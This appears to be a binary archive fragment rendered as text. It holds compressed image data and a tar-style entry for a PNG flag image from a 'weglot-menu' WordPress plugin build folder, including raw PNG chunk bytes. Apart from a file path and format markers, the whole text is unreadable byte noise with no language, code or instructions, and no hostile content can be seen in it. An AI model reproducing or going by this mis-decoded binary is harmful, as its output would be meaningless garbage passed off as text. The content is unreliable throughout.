�O���Ȯ D��T��/4�� ���IV�}�`�|�B?W)kl[�ьS��4���}��[��i�劎޸�s��N_j���Re�1s�뀛��o�l��4c������	��S���X�B�F�y��t�1�0P��|���̀[�2��ë��a7&��U߽�^���nG.s�w��3�
�[�&T�2��07�Wn��v��"��D)�q���&��ڿ%놢��VU�����,�f��o��9㷝w�2�h(�M�òe--����2��	�tXd)��w��u��Ưn�y�R��g7l���.��S��n�G��5��ο�����h �%i�/�'�?u�1�����?�F߳aZ�l}�pGDx:��|)Ӱ��9!)7��]�^�]i��4T�N=W��%n �V �cʺl��x���4h�1lO�w����ߘe�}���m�ZӶm�bZ��[OKj#��^���B)LK�����R%�ݺ�"(�a��(J]�
7b��m6���_M?���a�pW�/���e	��73�ǷX���@�
�ҷ��c�3_䔰��Vo�qp瀆;�>�c(�}}"n�
����
-f5H
��]6��OӔhJ�4���`�
ǟ�9�q�m!��2��+�kѕ���`l_��plޭD
T�t��2��o5�CӃ?�11��)�,Sz�DE�tz��n�l��`�P��9�{�����~;��U�Lp5�[�C���֍�t�H�A���S]jo�n���z���9ER�@�T�wp{�|�8Jk���k*�rn�p��󞫏�ho�X�u�qOϘ�S>�N��?Y㷭\������U��of܄��������;n��wъs��nv��[Z�.}���K��.f��;mR�$�[Y�u~��_w�U:%6�f}�_�9����]�[L�ߦ�p�Q��q�ܾ}��ۋo/v�>�� a�C���w���)����b�I�z&� mA˶����*:�䋜�/���vs-ni)V,[�Y�P,+(pӮ-�܅!~���>�%)���۰f���8��o�)ǂetH�p�|�D�v�:r�Hh^�	��n�b��E��$�#���E����$���NC4I%Lb(�]��2�����*'�K<��P,U�q����_.�ľ>,����2�F���fa���h���œ/3��Θ��AoT�m�'�^��O�@p?z�|h�ݛ��u�
p��Y������}q����,}R��Y#Vך���5��51?��l�?����ҁB^rc��N�f�P$k�Y��f���\�[��{>
�8+<�VDP�Na�<F{�j���=q_ȿa���zmm���6��׻�=}�ty�n�EU_���/�w��{��i")늺�P�����D�ܸ�pS��~݃�$����pzF^��&~�O'�����]���D%~��x�0䰇p;�N��pw�Y���q�{�z��C�n���po���	p�ڼ|ժ++^�Z�y��
Mw��n�/�S��1�y
��;���IlU%ǟҶ'"���N	�P){�y��rE�ݎ�q�>
���y��K#⋬u
p7����*���pLF3ٮ*ܡ�R�i����i����i��������ꓹD����"-y��;�Sڷ0뮒�Q�䎬j��p�����m��@L�%�66�� <
�c�J�e,�D���b���d�V��"��θ���뀻��ȣ�逛�o�	�[�[���i�FN�dڟY��<�Ng�ʋH�;ޜ7A���S���[�#�vwٕ����?�u�V�����pz<F6��7 u�m�K���/-�,�=�9��t{"&�!&p�j��ʻ`8]��|U��{]a-���2BP��UN*�S�]n�B[ �y�,�p�����)�(O�q'�s~?��_�?��3=������W6�t��cD��{��y���eˎ�y������"��/�
�t~�;H���	ى{��6~q���3O�0��E�%�	Q0i�_.��#�GMڬ;IZ����g�O��v�_|�۠�ȣ%�h�p��o�?��ߦ�E%~���j��&����e�z��~��o��{���v�"��^V���i�bپ}-
�
�-���7�yӎ�ޏ\� �������=�Qv�3�ܘ������.���\T���8�f��"Qrk�	��|�C�#S�e=Y�
B��$G��G("�<
��;��|;�-|��c��ٓ�+F����}4��x�}:>���Jg^r*n�Nk�{�_�Ѳ*�P�U��J�ujA�`��˝�V��…#"�<����h���gg��#02	t �˹��[w���9���Peh�Mp3��EÛ++�M�Rn(��0�V�o��[����N��m��6�/Ҋc��\w�ik�9��.�ׁ�
�
��h����g��W�C����\5.?��4�4�Я<��i�U��Fp��K��2��p�߅��azn{&o/�$p��oێ�~��ShW$P�Cg�?��?�gp�񣭚C2n�Ǥ���+��L��e��M�䅺߷o�9��p��#���u�_!6����t�K�Q7C��g�-��
N*0��p�߶n]���q�ם��܄�x��A�\�;a<��?�o���aJo��k��� ��W�h�~��l�;�'��}	|���Ki��D�ff���
"�����,����i�I���娀�,�_��ɭT��:n�mK���!�<�v��s�;����#�>����Xzp;�p��n��%?��Qc�2�߈�ELIq�kw__wj^Y�P��>���ǝ�B���ХX��A�%)��-��k�bM��";_�"�9o{�
|m)he&w����%/)(G�_�>�(LK.�?)	�o
pgb��Bi0�D�+��� ����\�>����o��&�V�M$�|Cwb���VN��LF����]U�����z��ȣ���{�N��<������{���5�A�81��;�p��@���#�&�c�a�GRv��%�T�p������ϙ'�G�F�4|�)�{p�y�V��n�[�5lW �y������:�&TC��ZsKA_ۯ2�[�-���;\�v}�n�h۸Q�|�xp_�#��d���/��.޻�	�N�F��F��vp#�o#�wC���8��i�rv��M����O�����`g�Y���,�����oj6pnpcY�R�W�Z[��^&� ��H�E�Q�_br�e$�|7��JKtI"Wf�|��q�����R�y�g�fp��[V�p;�q{�9�۾6�cc �V{������ik��8�7LU	���[I�{��7��]��<�m!Gp���&�E'�&�L��>�� n���Y����'yp�-���fQ-�v�Z�|;��U�`2�޶�]�����]n���ǿ?�0*���>�1����Ktp�+��xpKA��?�.��l�� �7��n�2�t���E�G|��ɀ[�y��G-��߹��mٲ��Gq�e��(��Qa�Y^�̀;��'d"�%%���A�ZM�^�����Qƕ1���1e>�۝�}����zp��ھ
����HN0�Xw���E�|9Q�}�_�~q���}��,�[���F���T��z��<�ʑ�����e�Ա?�7~�a��o�NR�H,eƸ�b<���v���'P�xb�*Q�6�5f���m��d�[g�6#�^?�S���pîMy���&�S\|s�7I�\���F����M�(����������އ�<t�۳��Oh�,X��A��G�ف��v|.Zw�\� 5³�[
�#��o���>]�,�7ˠ�$�@�2�xYR���R�*}=��?"P�׹�Sx
\F������El��[oC��Vp�ߝ7,E�P���8��\�;�H��2��7h+�o�����oo._T	�~��g��̬�5��D��Y7�!�g̹��F�6�-�MNv�Mz�[���En�hX�$���
���[��3�*Nԧ��ˣ/��qn�6z��;A	p�!�6R�6���e�:^��u�W�A��_FE���&z$��o���̴
'@��	E���|�|�(��{�U
p���%eK9��<�+2�	u6Q
��G��7�^��]���i�mG�
����q@O��;����+�������dԶp�Z5|��f�p3�ֺ�&�?Z�<I��n3�ށ	�١6f����� �{{�bV��n��8]uo�l����S{�M�o�2ܝ�C����kn��K�8l�S�3{���-&�J���A
�Fy
��7ULF-���Ll	�t���w�esm��+(��g��3�H���6���8�%)���2�c�J�X��mL���gpKK5�
}Jl0���̌|7���o
p�<���"PXp��vv�8������귱�(�5�e�E�TX��U/9_fp�%n\���*��ۿ��J�ϟ��ߛ�r`��~��{ц�m�R�4Y(3�Ϳ�����$���)1D����)�
S`�!�NZQ�Դ�L�5�)�㩎�[-�{��W��7(CCCw�	�?�xίy��
�E�g���a��`m� <�kgp�T	=�
�=@%p�?�0?އ��-�{/J��[�-.��٫�nZE��v�t�脐��EEC��Uw�͜�/��e703�k��~Ӕ�	Bo��߃�l�fS�EV�+qw	A�5�5�T��%)i��7��4�|��Y��SD�%�5���+�E��7�����6�]qg��*����.�)�/5����K4��1Q����D��3>.�h}r=y$�����3��0K�@��_w�2��l���(�,���D���h�]�Z��ܖڇ�nųf�N��8���'m��n�=��k6�\z��7��m�������5-��?A��$!*�//������ţ��;�у�k�_��?>��1�}�ŧ�̒%9��K�n���9
�˟�}t�(^��?�{����w�\�����{�ؖ�؀YD3^��8���Av��
��J鋋++[c���J	�@����w�"P�w���E˖q�J2�% �(��B4��&�i<)Ւ�Y�"�h�Ν;\i<��n�����OF�l�[$���p��[�9Xk}�烥A���*��Շ��B�6�Mb��H?qz"��<E�^��o'0t��G����D��i�m�����.R���f�`��H�v�>�g��\q�B�6�Y��{����	��=�_���a\HVk����{�ܿ�|�?6�7��އ7��I�����33�F������j)Z�n�\�a���#�V��o�%�B����l�s�S�;�.=0��aviz9J����}�j�,�m�z�h��|z�o�=޴Ρ8>��`�os՟K�KiMn�]�rx��a��������0~���m�۝��
ֈ�t�n�-֜rY�ˀ[V"g�sc��ʩl)����
�uA(�A����)�G�UҸn�hw��
��D�KR���=��
2�
��9�HT]�4�����2����ㇶJ!�̧qnK�.�;��χ��4���!�|�&4��{5�90��y�Vp�W���١�f����{�~pn��k�!E�D\�����w=������M���#��v�k�v;�m���p�#�oJ_�>^8�u
��NL�̥�1C�_]���W�9���S���>V#4�^��[<�n�m�n�����������ܴby�
��H!�H/����݆������>�H=Yfqg�+ع�+(�3M]�i��o��ӶQ��$�<�f�6w D�� o���
sp��hér
g��m)����p��p}CИ���p#���;��P���ӽ�g��7p��w��n�up��32�K��}�
�ٗ�/<��`��%�v��Y�Ҧn��NL�
X2��ax'3<<E�����%�z�N�vܙ�ΰ������ɿu�-S�:��vȤ�=�<�U��
�U�����n�}|��.F?_��wx�z2��Z���op���mw7b\��@Eᦃc�%��x�m�pW9|����+�������Ԁ���|c�]��McFs&��/�K��h	����E�PC-{��n�T1I"�&G���g"fa:f˃k

:�'�3ԗ�p'�ɓ
��7҉�̕1�_��+\�w{�Ԩ�05-�*���ʮ
}�J�g�j�Șh���9>�
��'��IdC��N�f�fg�$�v8ң��.�]���+�6!ZH�M+܀;�����@On*�
372����G7�p���wq2*~�M^��Yc�y	�9W���k\?��%��	Q`�h
�ov����~�ス���53��Ű�y��#(�%�7J�����]������ȋ���p_���r��7	�ͩi�y��it�-,�6��=K�!�OmcyNh\T)#��P���S���#�.a؍3
�]/��a}�6l�Hy>+��`߷{v�U����s�.t�ulhh3��\��|,{U�RęQ)�Q�	؀�!Z�!g���:�A��"���_��M�U*uZ�z%W�6�&o��5-�bܢS�������Y���}��n�m9LR��"E��̀{�'�3x�
"�xc�4'�7~���)�_�����4(7]�/U�nQ��<�ni��o���m)_�*0��
PN*�-��Wzn%o��[IT�r]n�
\�m��hC������?�~ů�=�w�?Yz�7��U���Z�����������Wnn�1�����/_��۵�w'Y�P1�{��5���Tpp�Z+K�ЖF.��v@C�.i�m<���h�&0�׽qcw*c�LnYB��p�Y��v��^���kw�TJ�͜�9��+d��;�qfa���}���>�۷��H n��:t� u�Ή[��R�]��[�c1x�-�Sxw�L��1A�������^i��'߶܀p?�o�7F|!�2
p��f>���A�ҥ�����JL	V�����V�-�3K�6-���b��T�WU��\�[�C�^�������F��}�0��|���=��O˽�Cy�6J���(��?y�]����ܗ-�R�ID��܅���,�U�M�h�K��3����Y������ò-~�m��~{��Š�CC���;�w/|Swb�ܭ�Q��S� 3��yBO��{��$� ��wP�v���M��n7����qp�:-6[A�p�
%�2\~�����cB9�<�]L<����,�1��ŵ�Ӡt���=����8�~p�"�^{��n1f�����T��mW��h"N\�%��@82�m!��X����w����L>}h(�q�F���������-7�8dg�n����[R��)����񘀛�0�w�o�3o�٘� ��-�H!D�cV���4q!@!�x������edKOk2^��D������D�>	��}��{CwB�+�`uV����)�
����]y�q�M��i���R�.���-Z�4���	�}�os#��&�W
�"w�|<��;���71��?!+F�r}�e�-O�����H�gp����/Yr���"�F�ߞۀ�矽t�׎�����i��ƽ��U�����7�΢R2��C��/Kh��Z?�]����K�
[ƚ�]��^��r�xpG�$@d�?΀;�GA<���Yfp����^O�j�^�[�����Y��ؐ�{5(�C�c��;m�e��m�*܏x=IH����J��O�-~��	�n�[�ڋYp�mؗ�����nv��w�[��&�E7��2C�ۍ�m�_�w�0G�mD^7��T�W��)O���ӾFI�f��e�'y>
E�qO���,�	ߦ"Y�P��j��:��
�>��no'���+��I�͖�mU���X��<��:���[��-���~�H�?�W.�~mn��؂�;�쟀
�iӚ�����*�ѧs�3n�E�Ι�t3&��4�&'F��q��L{�l�7�-��¹�k����!�ǏO��q+����:X7�q��z��+w�.n��[֭۷�i	��m�q8�R�^�d��?`�k�,|��·7 ���}�.��1���X���g�p�|��p�iw����O�Y��*�R�k-e(��B���G���Ⱦh�pp/�Μ�|��:,!�[Ne0�T:��h4u&�n�nF�a�h��lC��񙓱�b.8s�*���"j�.�2�
)xpWa�m�nZ�OtT'�J�܌�y�-,��m�S\��S�7/�k���1��n�z:��ݡzc7h=V�w���M�>zY�=�Q
�e �_�dܖn*�[�=��-�/�g_5��?��n�%&��g��܏�<_�#�"�3��=9���o��t{م�z��+����a��,��1���`	���<S����y��\���	��
7�-�ƍi5��E"������=�3��J���Y<}<U���#Kc��UT�v��`��.d}����s�D��sN�V��'���l���S��Ҡ7p�xf��[�pqYճ�q��ۀ[���X�<�dy��������gp���e$��p�R�:6�L]<ϻy��Ӳ��.����!k���ǧR�����&0o`ɒ�yp#�o�i���{���;����K8�SȨԙh���{��FGPR��rX�@Y�+@a�w�����Lt����E�bA�C�]�]Uv���#w����-�p{w��뭽|�rm�؝����r���q�u����'����-��Y�kQ¹�W�����[�<��쀛�P�[!:��qJ�pp��R1����Ѣ9R�1�}���n�u���{�'O���n*����V���`��?N�
߶����P�٥�udύt}` C��,ͦ�zi`n~�J��sחD�<�Mo{�o�nk�����S"�G�È�8l3�-��n\������N�W����,p/Z�t�����6���p���I�^��p��w�?��x��~cȥ2�������2/u�[���-�SV���7[Y�	�-2�yx�*6��j�p��y��n��8~�]4����0��7�;����Y����*vޘ,p'p�o�N�'%���y��%����bڟG�ڗ�7p���?��n.����7o7������U�!�m{]�&/��G�����D��"�n�������o����3�I��[��Cv�7A���]�G�mD�
.��}�})��p�R�Fsܶ��Ȥy�='7�����v�]�<�������[0���޿�cד���7	����]��Q��,�qp��]�nWw/cH7�o��n�3\�����[�5����'CBN2oϹv<�A��Z4]h��Rx�d�PxE�����{���)oF�ٹ�{�]�=�	��l�Qt���8�������D�N��������C�|Z<���}�t#�m��Ur�UWp��055Ͻ������� �ln�&�k���	��O˙%Kr �\����spύ���c�<��H��02�|Zu���[�mjT�s���ӧ�w��^���e��k��H���`�o	"�d�!�
U��`�v�<�A@�M"��ccc�c�2r��y!�o�#�����������#|�\�؆�
�y�]�dG����^E�M����3��d�V��Yw� vB'[y[7�%�'/""�c�{��Y�j�l�9�Q��g�6�6�o�?U	�y����p��.nk����U4p������aB�+�v�>�2�A��hÁ�	�͕�-�^>��ۥ�����~�|�;�oSe��#����W���	ai�a����������k̈́�%(���h,Ќ(���[�}�l�7{��Z6��ŋ���C��ϩ�x��T7�K!C�o͉�
܆�#�
�Z��1�/�;O���������n����y�=�w4fW�a^߼D8��o����3���y����{���܅ �\��d[)�	p[B��@��<����.��8�(op����������A��M�l�D���*��=���ƈ�v	p��eaT�nWw�P�^Կ�)�
ao0���P{p�oO����Aƪz����Y<��D(f�>)�~�����Er��:s�)��O�f\A�����q�k�s\�=��ۅ���W��)����>
���K���H����%�n~P+�n^��F}����=��z�M֝�52�QC=SP�ta���'g&&�_���bA�B��pg�D���;ʺ��E��#p�D
�A�r�e��}=~��_��۠h�d�YZ�~��pH�o#��,R��a����*�&�Ivp�|o��܉߆��A��/B�y�M���%p>{�s�z�������z��~{&���QVJ��v�
��p��-��n�	���|]z(��[����	�D��ӷp{.~�3�ۭ2[���~5K���`��m�+e�m���L���P���x�!~�.�[�}�ݹ
��%Y��P!������C����z1���'O�{�[�wޅps� ���<�yM~�6:����3���!�؈�>����fg�x����6n<�=Ӏ[�ٙ܉irA���p����([�63�6�p����7�n��ð���h?j�8���<���,�4��+�5��$��ܘqYX���������L���e�t��ۛo<�nL������x���e3Z��+o;��Jt�)*���$�ፖ���]o;\�
��C9�����8�33�9���F�B�%K�b��7N��<�~�7|�1(g"��-(����^�>?���b�1���o0�<x������
�N�6L�NӔ�Ec$p?���
�>R;�Cql�n��mx>5F`���&JNV(��E�n��q�=��A�����<�p�T����ϴjn�9�q�6�6�oS�(���gi<!��vp�N򿐓*�7y��)Q��RQm�%jb���	Y§o1�d��<��-o<��, ~ۑo3n@�ۯ�n����
�w������!���w����M���]��{���^M�wo:�֞?���"����n�2}ǥ�md�۵hnIB>��1G������<z}�����0��̡���?1�66�
���2�-�|������Z�6�6�pg�	����@������+��up���8�޿��@pp�.�Ɖ�vp��Y«=䴫C�
9DS�;'��?.���ܸ�sps����W�DoPi��l}rp���a���op��~R<�;��ˣ�+�rI����_����X�ȣ�+~{p���["��Q��(��p�ޯ��� cn��i���
V�6(�Id�D�z?}��}���(N����)~ۅ�
��+r�	��sl�+����n���n��Y�ԣ�g�n<��q�͕��#d7R�6B�9TG�����[P^ɖtWw8ڄ@�f�@P���|Ҽm�;+�+����ߞܳ��v`�*O�#�N|�
p�݌�m!���m0>�ĥIEND�B`�weglot-menu/build/images/square_flag.32ea47ac.png000064400000174121151330373270015574 0ustar00�PNG


IHDR*`0��X��PLTEGpLE�q�2o�K�\@7:=�L:da��K=}Yp��@5n�J��K�VhX+&&&S�ҥnGޥ2�1jt��lA.��H�J���4m�G�Q@���F8�1W�c&&&K��0o��o-�1&�5)�7Q�+Sڲ��	�{�+����܃{&V��J�����܌1ڳ5뵱�_S?u����w�������ޏ��䢛K���H�K9m���la童��9t�~4�������OB�������ʛ������`5����1.)����yp�T5�ݹ@n��XaX������n5ᚔ�WK�1̲BO���2���c����Nv�~{d#�������Y�Zߝ0��ȯ�]Χ/ïR������{��n�����-V��Ř0��Mo��/�7)��ce����ӝѦp."�F���NJ(e�J�?4��>0����܊�����p�ڡ�G���:z:c�f�—�k$���C5{7/x�PH*&Nu�������d[�OP@:$�ol�pGi�@�輻�H�م��jbQIw��ǁ2�z)��\~���F��-�+�2A�K`����G�kE֗�SŲ{���ڙT�ͱbe_Y/*D�M�Iusq��Pe����݆�p�ZaP'��
FFG�s^ο��[R��N�Ġm9Tv�r	�<-�����~[��Ů��t���"X0�����
&	�s}��st��׼(�#��>���r�x'�ė�V�ܳ�
����+z,%tRNS���������޳���t���x=����'IDATx��݋[SY�(��3��w��;��<�ߎ$�U3�����$��(	��$@�wP [T
�f� �(�P�U��jK��}l{���z�O����Y{�\�������܀�}Y{�w�ֻ�J��+x���p����/���:+��EY�Y`?��$b��!=�q�.d�iMv4x*�����?��/?�?�o�;�s]�Z������?��#�%�N��I��2�N,��4�nY�<Z&Q�Y�?O_�{|��W(�?�Z�[d��O�踗Oh���w��(�9W`����>�%�x�{b��k}&A�B����W�Em/�dd�]?\���(��B�l�W�G���U�L)��
Y����`�O����5`�L��Z����B��= v?�u��~�������p��Y�l8/�
[��#d��Y���Cn_����;
�~�����c���0K{���)W���Њ?�;$
{&
�r�	t�m������ޟ<"���x���w����g�)������%L�]����2��V�j_�A+��I��N{~���^�ۆ[Y^���zؾO��'l���Pv��j����
��'��@ݚ�,	1�� ���@����e6�������3�)��O��@�"ޤ����*������a�T�^��ϛ�E.ψc�^f3˓q�_�_@��y�0���
�
\�&v?��/�ӊ$�XW?I��0��R���l�z+�����}S�������hSĮ�-3�-����_A�@�T{��Nj�jqZ[�N/�
�����6��c~�~�/�nZ�/������,���	��
�a���>���l:��f3���ߟ����t��zx��Y�Ӝ�����_�{I�ϛ�G�(�=T�"��lusl�S�TQ�4_��;U���q��(n1��@���S��x(�jڧ�D̘���﶐�J�>�]�'��o|F���(�;d|��I�[�ڇ�h��w'���\�����O��KP>��w�%E�w;�������U���&�Sʒe�BP�����-G�y@��~�R�cG��`*gSv`����']�42��{K?4�	����
�z"�
��H�HՃy��i�b#S5c�4��@�U���t����4�4	�pIz݀)l}�ހ��Ը#[z`�lvO��TP`
�2�/��T)B����ϫ'6��4����GLE
ӚÊ0
X1R!�E���}9�X����-��n�A��@��Rӧ��2��)�T�	0��c��}$G��7`��z�%rүH������>��K_����6�g���kL��l�
�$����
ӳ���!`*q�&��7~��S��/���WC
ӈ�>��LES̗��)�/�>^b��S�0]���
0M
00�%���>~G���+La�CE�
����?�ކ\�TɁ�<M/�P��gS��G8@�z�28a�?��a�����Q$�k��i��ٗb�t�`#��C}��S���oL�0�n�ö?!��T��	L�n�([}�a��Z�;����
Cŷ����d�`Efe�[�L��݆��)ҵ��0��1eS|�~�5
{���S�0e�n_�A��I�/�2�3�E����f=�xw��p�V�SefVNNNVu6*
0�|��uL�����HX�p:D]t�SXazr�S�j��FG��^?�����8~����KA��z�4aZ�^��,��uLB�T*`�ܠv:_`��������B0��L!��/�T�0��+B�4p��j�Tz�G�����	������4�Զ���,&�{���aFWL"ySd`ڮ.����>3�����NQ!`Jd�N��760��?ʡR���7<0���B
�@S���ta�og��f<Ⱦ4#���S�-L%��p���|�N�F@
S��ILE
Sܗ*C��חB/�H�bU�b4�`^h`
GL�0}�N�
S�P��Y~����}_�|�'ׇIL�婸0���b����	S���`*J��F�ܯ���b�__Il���<�����T��8��=	���R-'0��6��L�”��|�/�y�0
80�i<E� �R9
X&��߇����4�v�8�([ó���c����S�0e����7$0���Ȍ�϶��7�%0�Q��)H��׸�
��o�^u`ZU��=iZ�6�]%�ϗ�;�SQ�S��:�k��#��-eh &�B
Ӱ�L�z�!``z����Yx��և�����|��>�*�Ԍ�~��Ȟ����\ɀi���a�6�z��N,���'T�QB�T0-l.t���=�)�0��9-���� �\��_�N��L��B��c�"LV��C����鯵�>�m���n�(1
S��in�J������2B��'�]1I��e�%[p��bNr`�����Q�S���!LC��M�b8��o640��?ʡR��mx`����S�N�N�����h�0��Ӂγ�%�,��s��K�B�TZ`
]��3`���7`ʱ�J��|�WC��Ha�A{`��U�0%|��0�����	����͆����
80�!�>����KC�T��Շ�S��̬juz��Mr`Z�Kզ'k<���Tmv�?l`Z���e0!L��@�<�	
�D��/�/�t�w�G�a����0]o��=�C�
�J�<��4a��n_���{�`2(��K�������T��/��H���0��JQ
�������#X���<�iC��S—!��|i�<F��yВ`z�6&�ZN��[T�sv\�/��A���U�J�K�-0}�w�ډ���)o�5
9��:x_ �[�|�qoR_�M,�����d\k��1���-���7�L����z���B�P��h��La��LA7Y�����c1\�*lg~�U���~ӎ��>��x`z�0�Vb6��$'65*�10�U(�M �X0?��^`Jߌ�,�nќ�p�9�5�P�Գ�V�	&��mɍ<g��B	S���3q�4LRt��=T�?�`�tF<1
S��)����Le��Lk��s]�N�K��|I"��0���>�}�IR`��era���'va��C/���-����(�Ia:&��T}h�������L��i�����޲����S�!L�v��3��?�y��K�@/��L��L�^
8�b_�Rm/_��0�4R�z~p>0�4�R�0u�҈0������˗����ыq����i�S����ܼ�U��wB�T0��}��3�VO�|�l�Q0���W_���~op�?]����x���=��8�T���)��~q�t?��i�8a�y�/��l�&sd}�S��K�!0��?����R-�T�t/$0��M�2��Ǘ~��{?�OL������2�ᨍ?�~�!`�L�[��#�uw�����*��v0`+�l�0eS�/�ހ���K��_z˓:�+1�������A�ՠ�:�&s�4�����p������z�%/0Ň�M�Q܊U��1N_��@��!q��%q���I��L	�Xrj\FL�<&6/@��_��vS�k���ڳ0=T?�iZZ��L!��u	L��o
����A�)+p�Rɩb�7�
L�VF�V:�VV�:��c"�iv6/0��uܖTA�G,%�����&h�YYb֎�l<��o]�)�0u�&����ʇ��D/�l��.��)�0���ӓjE��ԖPƕT�E~?��	S삧�)70=��VB�T�F~Z��md`
�ҽ�M.0��T���D�;[ %0Ջ<`�G<1��}��*LC��?�)���F���G9L
�>���	����*@����ͫLa�i�����^�t�`��fo�cf��0��B�o!`*-�b]�Rm/،rHa)Ly.�&
0'Lݾ4L�})t0��⢡*ڰ�X��K{@���0KL}�����������!`*��ԇ�Sy�j���g_P�:�ف�W�[)=���TV����s�f�4Y�����������7�Sq��&H_I�>-*��k
L�B�tS��O`*��HL��p�_ل)����^��N�p`�٣!h��R��z��M��(�6�~,����DM=G�?B=B%o��{e��#`�aS0%�R������R���=L�,0�x��w{�6���:g�Ɣ-�P<0-P���+��DW���6��\��`�Gy�w���/uu c�D�S��F�+`J�Ҍ�e�2�SS�bh>S>a�ڻ�6�}`C��]Y>w�!�Aaa�JL���u
L�

�a���iN��+�sbI5��l���
���_�3�36��􍎎��GX+]0��9�v��ص��L�Pk�/m��Q�8���S�R�L�퓓��
0���Z�E���F>�L]{M �ix�V�_�B�žN/z���b.=���~����t:r��f����0��	SE�Hb�
L�H���u����E���K`*�dn`z�v�S�r~$����h	0%�M�dS������%���=ɳY�i��*���ݼ��)\�Q��tL�/0
��d`Z�P\´���4���x�&+t�4�3�)]��7��y΢���!`*90���B�TZ�Ŷ���^��ܒC
�HaJ�>�ӈFaa��!`��K����ة�XmUl�T�6@�4��kL�S_��ΆY�svv�an\�zJs�+�ÆȟM`{}q��և�ScXKj�R}�%�i�U��z��sQ �)6�/�.���BS�iXЁ�aJz40#LIo���m]n�Ƈ�)o��0���B�}h�Si�G*`�ϐ�]6aJ�������4�Ԕ#�U��[&H<[ְF�c�� �E ��0�^G���]G~Bb���Hy�"
@�� bk&���ȚS�0�S�/�m8`J������<O��N��^����4]��Q����IN����sC�\}#���q��
7Vj_,`ښ$L�A�q�ۖ:~`�#���a���d�%��"$:��	r}��EEMEG'��GOGE�rS�^0�nd`J\�>���xp��i!`���ֵ����S��p�S�U�T���:�io���w�Z�D�,�/������􍭌��\p<��G��C>�L�9�jYMk�������>>+s��^[`�E�D������^`j�[��;_@Ӯ� I�h
���W^Wn�Dn�-k��a�_�T�0�p^1s����B�Է�'�����Hb����ԊZ�����8`�����6`^��������KK� �<��LB`
:�#������]`�1i���0��D_}�͆�P�G9D
�>?��TԾ;��
L��B��۷���[��0/L����u����B��S͛����h�t��J�c�E��!`*=0�����VMG�1�i|^޴���l�@��@�*9�0����z�b��
S�/
S~_
��t*�0e��g�l�= �&�0CL}8��~������?.�K�����B���)WZ�s�z��<�0��/��f<����S}6yW�Z�
S^o����g@��41����uLe�_��"�)�
�TX����Ks�!�e�딄�)��&^�P����C��J�<A�l”
L)ox�-L��D^
�A�2��`we�M��m#SE��r�7��l�[���A �i�D�:C�[�3�;=�*��90u	�T�0�S�Ku^_��)ŗ��a?�Q5�y��*���_��L�~���)�i�	ud�?=�Hs�]�	L�7�p�����/^�^"(��Ӗ.���V�x�1��z�ۗF�ۙE`����Qz�z����Բ,�!5:.:�(!58�@SNaj���U���p=T߁i!�XB��	���;1�;�һ��7S��p�S�2��Q����ι��YlD�i��i�%��8�2��M:*}�}=c+�c`�t�c%we���O8��~�w[.f=�����6�)F���©p���B��r�h
�d�]Y���5��Y�ݢ������`���r�E���P����~L[r#�Y��\���~���	�OV�DF�A����)<��^_
�_!`�Kѥ��Ԩ���]�g>S@nr�0ELC�4�4�>�6?���A��,8`z9����m>�����ߤ��?X�t^aoV������v�D�ga~S1�
<0��†��4L1�#P��640�?���7������Luy��_8q������e�n{d[�ha��S��t-�)|�7���wiҐ̵��<�p��o��E�ګ�%�0ݡ�k�4LLa�)�itU�!6M�o�a	Y�)��!��T��U]]���!0�-��	�b�������j��4R���
�/��B”�K��e�0e�zyXMD��:/*j:1�r��ix�ZSabJ��;4���i��w��GP**���7Y�Q�ǎ\�-زukRRR�1���4�5/L!�C_�����Ne��+GI_9�)�7pSL�F'`�4>��l���߭_`*Z��L�)�e���0���KKi��܊���vC�Tz`
��	L�Xf}x���SaJ�ԗ��gzG�ӛӃL]�K�-�r����쮇�!`�L��H�|g�zigC}��*y3�fR�j��������g0�iY�R�)�K�=�t���J)���X�)m���C@����Y�{��f���Y7\?��Ȓ�ƺ�Zb���\780��O��M��mP�V��vZ&��$�R���@cyR����0�]f��m�b����R�c��S)�Sa��[,0ݭZPQ�����b{��St8��Y�D��0���:PZ&��4�L`w��f����10��wd�����a��{iS��H��C��ϦX`
|)H_��}cc+taʺ�qv��l%�����OX�
dqhfm��;�i�����s��`Z����^Ld��mh�77�%��^���l Y+7�t6��Xa�ͭz�t+2���!HdJ�V���o}�[�T0�LK8��؍
�F�4b�5�p�
D�B�ԇB�s%0�L����������"�i���0M��5�P�t��r���0�����$�pQ�v~$s����ƒ%K��i;hŒ{v�i��y�z�#�˗�=��~�01��}�1---C���)>�V�������ѕ�.����x_��->���M����6����b_>e$0��?�����GW���O<�
0��c��}{��Ͳ�46
+��.��`*V����-Lw��r�s�͔�M7����s����=Ʉ46lAU
����UL~��S��o`�"Hj|T<��o�{�8�.1�L59���p�f�S��/��9^�2GT����&��h8�p\ `�/Lɾ�o`��lCӃ"}�k|3[|��	��U����.'���v̀�1e�w��֪vXvԂ_^�C�ҟ*p^,-=��?TZZ:'I�Zs�=5^�Rvj_���;[d���]Ёi��KЀ���7`j�zF
�FDtW�GD��S>o�SO�Tpz�Np?��ax*���_��=P�_�u|6���`* L�/�L��)�EH_�`4-�qS!`�վE
�xt�:���I�۟"��T���j�Qn`Z0.0e
S20����qc���� Ӳd�
Թ�X��QH�f=w1LY�i�~�aig}}���;P��p�j��+���D�O�K�0�S�/���'Ti�*!�X���Kۚ�����<ەX`����ßTy���O����W��Kp�i+����+���p8�a6�a�R��Ƣ��@f H�r%���_c`�D]�F�%�3$D�cD5�|�LajT��m�2��B�]}����/��TH
0���,|-�iKoSS�`�p-�)6��%j�w�{�ҵϒ����/�����S,ai.9s��Xn��؊ 0��
L�:��[��4o�!���
	�i�{��w����Y4G��~v|Ce0ͦ�R!`��t6L:��`���
LuF�ި2�6�
S��B�b	)L��H�k0|���x"S+���Q#}��8��h��)vo�k�|)��!`�C1P"�L`qW-tܪ�F�L1aJ\@E���"��}�"����)����D��L��@/���$�e��<`*�����^�a'��ؤ�5�5�#��x�i��b���%�ͨ�0�L�g��Aڜ���7?���&=z��/0E��@ӏ�"���&fշ�}��������h�hn.��X����Q�oJ�KT���|��o �IC;6�)L+*�M��/�	L��c�P�cAw�ą���W�a�F�n��^�>���l�+i�)���������#�e$S>/�l�w:���ۙۓ�H�N�-�v�7��1|i�JLa���iQQ|�a*./�Q	)y�)��8p�"���b�F4���qE���P:1]o�4���xu���)L��p56>@��O�R|���4��eP���L���R���4$�P#��].��V�ݻ'��f�c++c|�4i
�)?1ey�eǵ���;,�i��⏥��
E�R��t��KU3����${R2v0%�R��|YxRR�� S�C&ۓe�),�1e�!���}�*��h��6����4Xڈv�/�������Ϯ�g�*�ӿ�����+3�%����/^���”��O��O��^��(	�ؼG�Mw���j�PYo�������8`*��03�64pg0cOٿE���p�
